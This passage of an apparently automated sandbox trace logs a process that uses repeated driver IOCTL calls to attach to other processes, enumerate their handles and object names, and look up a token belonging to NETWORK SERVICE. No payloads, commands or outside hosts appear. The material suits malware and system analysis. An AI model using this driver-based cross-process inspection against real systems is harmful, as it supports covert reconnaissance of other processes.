returned 0x0 [0244.392] PsAcquireProcessExitSynchronization () returned 0x0 [0244.392] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0) [0244.392] ObReferenceObjectByHandle (in: Handle=0x284, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003710f20, HandleInformation=0x0) returned 0x0 [0244.392] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.392] PsReleaseProcessExitSynchronization () returned 0x2 [0244.393] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7b [0244.393] ObQueryNameString (in: Object=0xfffffa8003710f20, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.393] ObfDereferenceObject (Object=0xfffffa8003710f20) returned 0x2 [0244.393] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.393] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.393] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.393] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0244.393] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.393] PsAcquireProcessExitSynchronization () returned 0x0 [0244.393] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0) [0244.393] ObReferenceObjectByHandle (in: Handle=0x288, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003710dd0, HandleInformation=0x0) returned 0x0 [0244.393] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.393] PsReleaseProcessExitSynchronization () returned 0x2 [0244.393] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7b [0244.393] ObQueryNameString (in: Object=0xfffffa8003710dd0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.393] ObfDereferenceObject (Object=0xfffffa8003710dd0) returned 0x1 [0244.393] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.393] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.393] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.393] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0244.393] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.393] PsAcquireProcessExitSynchronization () returned 0x0 [0244.393] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0) [0244.394] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800371cce0, HandleInformation=0x0) returned 0x0 [0244.394] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.394] PsReleaseProcessExitSynchronization () returned 0x2 [0244.394] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7b [0244.394] ObQueryNameString (in: Object=0xfffffa800371cce0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.394] ObfDereferenceObject (Object=0xfffffa800371cce0) returned 0x1 [0244.394] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.394] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.394] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.394] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0244.394] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.394] PsAcquireProcessExitSynchronization () returned 0x0 [0244.394] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0) [0244.394] ObReferenceObjectByHandle (in: Handle=0x428, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0244.394] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.394] PsReleaseProcessExitSynchronization () returned 0x2 [0244.394] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7b [0244.394] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.394] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0244.394] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.394] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.394] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.395] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x46, lpOverlapped=0x0) returned 1 [0244.395] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.395] PsAcquireProcessExitSynchronization () returned 0x0 [0244.395] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0) [0244.395] ObReferenceObjectByHandle (in: Handle=0x460, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000c01b00, HandleInformation=0x0) returned 0x0 [0244.395] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.395] PsReleaseProcessExitSynchronization () returned 0x2 [0244.395] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7b [0244.395] ObQueryNameString (in: Object=0xfffff8a000c01b00, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.395] ObfDereferenceObject (Object=0xfffff8a000c01b00) returned 0x3 [0244.395] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.395] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.395] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.395] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0244.395] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.395] PsAcquireProcessExitSynchronization () returned 0x0 [0244.395] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0) [0244.395] ObReferenceObjectByHandle (in: Handle=0x468, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000c03fc0, HandleInformation=0x0) returned 0x0 [0244.395] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.395] PsReleaseProcessExitSynchronization () returned 0x2 [0244.395] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7b [0244.395] ObQueryNameString (in: Object=0xfffff8a000c03fc0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.395] ObfDereferenceObject (Object=0xfffff8a000c03fc0) returned 0x2 [0244.396] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.396] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.396] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.396] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0244.396] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.396] PsAcquireProcessExitSynchronization () returned 0x0 [0244.396] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0) [0244.396] ObReferenceObjectByHandle (in: Handle=0x490, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0244.396] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.396] PsReleaseProcessExitSynchronization () returned 0x2 [0244.396] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7b [0244.396] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.396] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0244.396] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.396] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.396] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.396] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0244.396] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.396] PsAcquireProcessExitSynchronization () returned 0x0 [0244.396] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0) [0244.396] ObReferenceObjectByHandle (in: Handle=0x4a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0244.397] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.397] PsReleaseProcessExitSynchronization () returned 0x2 [0244.397] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7b [0244.397] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.397] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0244.397] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.397] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.397] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.397] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0244.397] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.397] PsAcquireProcessExitSynchronization () returned 0x0 [0244.397] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0) [0244.397] ObReferenceObjectByHandle (in: Handle=0x508, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0244.397] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.397] PsReleaseProcessExitSynchronization () returned 0x2 [0244.397] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7b [0244.397] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.397] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0244.397] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.398] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.398] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.398] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0244.398] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.398] PsAcquireProcessExitSynchronization () returned 0x0 [0244.398] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880053c85d0) [0244.398] ObReferenceObjectByHandle (in: Handle=0x5a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800e2e78e0, HandleInformation=0x0) returned 0x0 [0244.398] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.398] PsReleaseProcessExitSynchronization () returned 0x2 [0244.398] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7b [0244.398] ObQueryNameString (in: Object=0xfffffa800e2e78e0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.398] ObfDereferenceObject (Object=0xfffffa800e2e78e0) returned 0x11 [0244.398] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.398] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0xc8 [0244.398] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0244.398] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8003737b30, HandleInformation=0x0) returned 0x0 [0244.399] ObOpenObjectByPointer (in: Object=0xfffffa8003737b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000588) returned 0x0 [0244.399] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb4 [0244.399] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000588, DesiredAccess=0x8, TokenHandle=0xfffffa80030b9a00 | out: TokenHandle=0xfffffa80030b9a00*=0xc4) returned 0x0 [0244.399] ZwClose (Handle=0xffffffff80000588) returned 0x0 [0244.399] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.399] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0244.399] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="NETWORK SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0244.401] CloseHandle (hObject=0xc4) returned 1 [0244.401] CloseHandle (hObject=0xc8) returned 1 [0244.401] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.401] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0244.401] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.401] PsAcquireProcessExitSynchronization () returned 0x0 [0244.401] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0) [0244.401] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800365af20, HandleInformation=0x0) returned 0x0 [0244.401] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.402] PsReleaseProcessExitSynchronization () returned 0x2 [0244.402] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0244.402] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.402] ObfDereferenceObject (Object=0xfffffa800365af20) returned 0x1 [0244.402] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.402] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.402] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.402] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0244.402] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.402] PsAcquireProcessExitSynchronization () returned 0x0 [0244.402] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0) [0244.402] ObReferenceObjectByHandle (in: Handle=0x84, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003665760, HandleInformation=0x0) returned 0x0 [0244.402] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.402] PsReleaseProcessExitSynchronization () returned 0x2 [0244.402] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0244.402] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.402] ObfDereferenceObject (Object=0xfffffa8003665760) returned 0x1 [0244.402] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.402] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.402] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.402] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.402] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.402] PsAcquireProcessExitSynchronization () returned 0x0 [0244.402] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0) [0244.403] ObReferenceObjectByHandle (in: Handle=0x15c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800374bad0, HandleInformation=0x0) returned 0x0 [0244.403] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.403] PsReleaseProcessExitSynchronization () returned 0x2 [0244.403] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0244.403] ObQueryNameString (in: Object=0xfffffa800374bad0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.403] ObfDereferenceObject (Object=0xfffffa800374bad0) returned 0x1 [0244.403] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.403] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.403] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.403] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.403] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.403] PsAcquireProcessExitSynchronization () returned 0x0 [0244.403] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880053c85d0) [0244.403] ObReferenceObjectByHandle (in: Handle=0x164, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800374cd00, HandleInformation=0x0) returned 0x0 [0244.403] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.403] PsReleaseProcessExitSynchronization () returned 0x2 [0244.403] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0244.403] ObQueryNameString (in: Object=0xfffffa800374cd00, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.403] ObfDereferenceObject (Object=0xfffffa800374cd00) returned 0x2 [0244.403] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.403] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.403] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.404] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.404] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.404] 